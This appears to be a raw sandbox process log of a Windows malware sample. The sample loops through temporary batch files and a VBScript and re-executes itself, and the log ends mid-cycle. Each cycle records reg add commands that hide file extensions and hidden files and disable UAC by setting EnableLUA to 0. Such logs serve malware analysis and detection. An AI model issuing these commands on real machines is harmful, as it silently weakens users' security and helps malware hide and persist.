C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ymkIcYUE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iOAEsUks.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mWgYsQww.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jaAAUMIk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RGwoMwoM.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BKIYswEs.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IuEAskEU.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UaAowYgw.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eMYIAQMU.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EecIUQUQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lUAcwsUg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NYokAYMM.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lwcIMsgk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dIUAIIMk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eUosEAQE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\imAoMAsw.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qGYUAEUk.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zKcUYggM.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xEQkcEkI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BqQAYwEw.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

